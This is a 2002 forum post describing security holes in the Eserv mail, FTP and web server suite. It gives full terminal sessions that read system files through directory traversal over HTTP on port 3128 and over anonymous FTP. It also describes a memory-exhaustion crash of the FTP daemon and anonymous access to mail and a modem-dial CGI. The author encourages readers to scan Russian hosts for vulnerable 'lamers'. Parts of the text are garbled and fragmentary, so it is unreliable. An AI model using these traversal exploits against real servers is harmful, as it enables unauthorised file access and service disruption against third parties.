|
-
February 18th, 2002, 08:22 PM
#1
 Russia Security
Last night when I was on the Internet at 4:20 am I was "chillin" like usual, I wanted to see if I could find security issues in other countries (besides America)Let me tell you other countries China, Russia etc... Have many many security promblems, holes, and this is what I found
FTP russia security
The first occurs when the daemon is fed over 40 or
so "USER whatever" strings. The FTP runs out of memory.
E-Serv is a SMTP, POP3, NNTP, FTP, HTTP, Proxy,
When testing out The HTTP server on a computer is
accesible by default on Port 3128 and will most probably be moved to port 80 on
servers where it's being used as a webserver (It is also the Proxy's remote
administration), I found it to have a very serious security flaw. All
versions prior to 2.8 are vulnerable. Regardless, updated versions are still common and I don't think the vulnerability
has been covered publically, here at antionline.com so here it is!
[drew@Tali-fusion]$ telnet .windows.box 3128
Trying 192.168.66.7...
Connected to tali.windoze.box.
Escape character is '^]'.
GET /../../../../../../../../../../../../../../autoexec.bat HTTP/1.1
HTTP/1.1 200 OK
Content-Length: 597
@echo off
SET BLASTER=A220 I5 D1 T4
PATH=C:\WINDOWS;C:\WINDOWS\COMMAND;C:\JDK\BIN
CHOICE /C:YN /T:N,05 "Load SoftICE Debugger?"
If Errorlevel=2 Goto End
If Errorlevel=1 goto Softice
:SoftIce
echo Softice Loading
C:\wyze1\exec\SOFTICE\WINICE.EXE
goto end
:End
echo Starting Windows
C:\wyze1>ftp localhost
Connected to
220 Eserv/2.8 FTP ready
User ( none)): anonymous
331 Password required
Password:
230 Login OK
ftp> ls /../../../../../../../../../../../
200 PORT command successful.
150 Opening data connection
226 Transfer complete
ftp> ls ../../../../../../../../../../../
200 PORT command successful.
150 Opening data connection
226 Transfer complete
ftp> ls
200 PORT command successful.
150 Opening data connection
226 Transfer complete
ftp> get ../../../../../../../../../autoexec.bat
200 PORT command successful.
150 Opening data connection
226 Transfer complete
ftp: 425 bytes received in 0.05Seconds 8.42Kbytes/sec.
ftp> quit
221 Goodbye.
. Also that the FTP server will be on port
3121 by default, and may be moved to port 21 on some computers
that will probably apply to current versions
as well: so an E-Serv server can be a nice anonymous mail pickup for anyone who cares
to connect to the POP3 daemon and login anonymously. The daemon also does
stuff like making the modem dial/hangup CGI feature (http://host:3128/dial)
accessible to anyone with a user-level login, including anonymous, although it
can be configured to be (dmin only, is like this by default. for the
webmail interface accepting anonymous logins. - A hint: looking
for lamers that run E-Serv? Scan Russia.
hope this helps
 
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|
Reply With Quote